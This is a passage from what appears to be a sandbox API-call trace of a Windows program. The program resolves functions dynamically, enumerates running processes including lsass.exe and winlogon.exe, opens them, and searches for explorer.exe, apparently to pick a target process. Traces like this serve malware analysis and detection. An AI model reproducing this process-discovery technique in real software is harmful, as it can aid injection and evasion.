dwFlags=0x0, lpMem=0x653c00 | out: hHeap=0x560000) returned 1 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6106a0 | out: hHeap=0x560000) returned 1 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615a40 [0186.888] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615a40 [0186.888] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0186.888] GetProcessHeap () returned 0x560000 [0186.889] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.889] ResetEvent (hEvent=0x8) returned 1 [0186.889] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 133 os_tid = 0xc80 Thread: id = 134 os_tid = 0x7bc [0186.637] GetProcessHeap () returned 0x560000 [0186.637] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617100 [0186.638] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0186.638] GetProcessHeap () returned 0x560000 [0186.638] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.638] Sleep (dwMilliseconds=0x64) [0186.774] lstrlenA (lpString=" ") returned 1 [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0186.774] lstrcpyA (in: lpString1=0x617150, lpString2=" " | out: lpString1=" ") returned=" " [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6171c0 [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615a40 [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615ea0 [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ea0, Size=0x37) returned 0x616ad0 [0186.774] GetProcessHeap () returned 0x560000 [0186.774] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c) returned 0x615f00 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615f00, Size=0x39) returned 0x616b10 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1d) returned 0x615d60 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615d60, Size=0x49) returned 0x620190 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b10 | out: hHeap=0x560000) returned 1 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ad0 | out: hHeap=0x560000) returned 1 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x25) returned 0x613440 [0186.775] GetProcessHeap () returned 0x560000 [0186.775] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617270 [0186.775] ResetEvent (hEvent=0xc) returned 1 [0186.775] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0186.898] GetProcessHeap () returned 0x560000 [0186.898] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.898] GetProcessHeap () returned 0x560000 [0186.898] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x560000) returned 1 [0186.898] GetProcessHeap () returned 0x560000 [0186.898] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x14) returned 0x615a40 [0186.898] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcessId") returned 0x7ffb2624b4a0 [0186.898] GetProcessHeap () returned 0x560000 [0186.898] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.899] GetCurrentProcessId () returned 0x57c [0186.899] GetProcessHeap () returned 0x560000 [0186.899] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615a40 [0186.899] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateToolhelp32Snapshot") returned 0x7ffb2625e800 [0186.899] GetProcessHeap () returned 0x560000 [0186.899] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.899] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0 [0186.903] GetProcessHeap () returned 0x560000 [0186.903] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617250 [0186.903] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32First") returned 0x7ffb262785d0 [0186.903] GetProcessHeap () returned 0x560000 [0186.903] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.903] Process32First (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.903] GetProcessHeap () returned 0x560000 [0186.903] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617100 [0186.904] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.904] GetProcessHeap () returned 0x560000 [0186.904] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.904] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x65, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.904] GetProcessHeap () returned 0x560000 [0186.904] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617210 [0186.904] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.904] GetProcessHeap () returned 0x560000 [0186.904] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.904] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.905] GetProcessHeap () returned 0x560000 [0186.905] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617100 [0186.905] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.905] GetProcessHeap () returned 0x560000 [0186.905] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.905] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0186.905] GetProcessHeap () returned 0x560000 [0186.905] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617210 [0186.905] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.905] GetProcessHeap () returned 0x560000 [0186.905] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.905] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.905] GetProcessHeap () returned 0x560000 [0186.905] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617140 [0186.906] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.906] GetProcessHeap () returned 0x560000 [0186.906] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.906] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0186.906] GetProcessHeap () returned 0x560000 [0186.906] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617250 [0186.906] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.906] GetProcessHeap () returned 0x560000 [0186.906] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.906] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.906] GetProcessHeap () returned 0x560000 [0186.906] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617100 [0186.906] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.909] GetProcessHeap () returned 0x560000 [0186.909] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.909] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0186.909] GetProcessHeap () returned 0x560000 [0186.909] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617250 [0186.909] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.909] GetProcessHeap () returned 0x560000 [0186.909] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.909] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.909] GetProcessHeap () returned 0x560000 [0186.909] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617270 [0186.909] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.909] GetProcessHeap () returned 0x560000 [0186.910] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.910] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0186.910] GetProcessHeap () returned 0x560000 [0186.910] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617140 [0186.910] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.910] GetProcessHeap () returned 0x560000 [0186.910] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.910] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.910] GetProcessHeap () returned 0x560000 [0186.910] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.910] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.910] GetProcessHeap () returned 0x560000 [0186.910] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.911] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x200) returned 0x1d4 [0186.911] GetProcessHeap () returned 0x560000 [0186.911] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617100 [0186.911] GetProcessHeap () returned 0x560000 [0186.911] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617110 [0186.911] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.911] GetProcessHeap () returned 0x560000 [0186.911] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="explorer.exe") returned 0x0 [0186.914] GetProcessHeap () returned 0x560000 [0186.914] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.914] GetProcessHeap () returned 0x560000 [0186.914] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617190 [0186.914] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.914] GetProcessHeap () returned 0x560000 [0186.914] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.914] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.915] GetProcessHeap () returned 0x560000 [0186.915] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617100 [0186.915] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.915] GetProcessHeap () returned 0x560000 [0186.915] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.915] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0186.915] GetProcessHeap () returned 0x560000 [0186.915] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617180 [0186.915] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.915] GetProcessHeap () returned 0x560000 [0186.915] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.915] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.915] GetProcessHeap () returned 0x560000 [0186.915] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.915] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.916] GetProcessHeap () returned 0x560000 [0186.916] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.916] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x220) returned 0x1dc [0186.916] GetProcessHeap () returned 0x560000 [0186.916] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171c0 [0186.916] GetProcessHeap () returned 0x560000 [0186.916] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617130 [0186.916] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.916] GetProcessHeap () returned 0x560000 [0186.916] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.916] StrStrIA (lpFirst="lsass.exe", lpSrch="explorer.exe") returned 0x0 [0186.916] GetProcessHeap () returned 0x560000 [0186.916] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.916] GetProcessHeap () returned 0x560000 [0186.916] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x6171c0 [0186.916] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.916] GetProcessHeap () returned 0x560000 [0186.916] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.916] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.917] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.917] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x278) returned 0x1e0 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617100 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617250 [0186.917] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.917] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x6171c0 [0186.917] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.917] GetProcessHeap () returned 0x560000 [0186.917] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.917] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0186.918] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.918] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x298) returned 0x1e4 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617210 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617270 [0186.918] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.918] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617210 [0186.918] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.918] GetProcessHeap () returned 0x560000 [0186.918] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.918] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.919] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.919] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x32c) returned 0x1e8 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617250 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617110 [0186.919] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.919] StrStrIA (lpFirst="dwm.exe", lpSrch="explorer.exe") returned 0x0 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.919] GetProcessHeap () returned 0x560000 [0186.919] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617270 [0186.920] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.920] GetProcessHeap () returned 0x560000 [0186.920] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.920] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.920] GetProcessHeap () returned 0x560000 [0186.920] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.920] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.920] GetProcessHeap () returned 0x560000 [0186.920] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.920] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x360) returned 0x1ec [0186.920] GetProcessHeap () returned 0x560000 [0186.920] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617100 [0186.920] GetProcessHeap () returned 0x560000 [0186.921] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617110 [0186.921] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.921] GetProcessHeap () returned 0x560000 [0186.921] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.921] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.921] GetProcessHeap () returned 0x560000 [0186.921] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.921] GetProcessHeap () returned 0x560000 [0186.921] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617210 [0186.921] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.921] GetProcessHeap () returned 0x560000 [0186.921] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.921] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.921] GetProcessHeap () returned 0x560000 [0186.921] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617190 [0186.922] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.922] GetProcessHeap () returned 0x560000 [0186.922] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.922] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x37c) returned 0x1f0 [0186.922] GetProcessHeap () returned 0x560000 [0186.922] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0186.922] GetProcessHeap () returned 0x560000 [0186.922] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6171d0 [0186.922] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.922] GetProcessHeap () returned 0x560000 [0186.922] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.922] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.922] GetProcessHeap () returned 0x560000 [0186.922] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.922] GetProcessHeap () returned 0x560000 [0186.927] RtlAllocateHeap 